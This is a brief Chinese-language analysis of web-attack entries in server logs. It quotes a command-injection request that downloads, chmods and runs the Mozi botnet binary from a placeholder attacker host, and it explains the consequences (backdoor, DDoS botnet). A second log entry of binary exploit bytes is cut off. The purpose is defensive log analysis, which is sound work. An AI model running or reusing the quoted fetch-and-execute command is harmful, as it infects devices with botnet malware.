常见的web攻击分析

命令注入攻击

41.56.180.56 - _ - - [13/Jan/2026:20:54:50 +0000] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 157 "-" "-" "-"

分析

wget http://攻击者IP/Mozi.m -O /tmp/Mozi.m chmod 777 /tmp/Mozi.m /tmp/Mozi.m dlink.mips

如果Nginx以root权限运行，且存在漏洞：

• 下载僵尸网络程序

• 植入后门

• 加入DDoS僵尸网络

二进制数据/加密的漏洞利用攻击

33.250.206.34 - _ - - [13/Jan/2026:21:50:22 +0000] "H\x00\x00\x00tj\xA8\x9E#D\x98+\xCA\xF0\xA7\xBBl\xC5\x19\xD7\x8D\xB6\x18\xEDJ\x1En\xC1\xF9xu[l\xF0E\x1D-j\xEC\xD4xL\xC9r\xC9\x15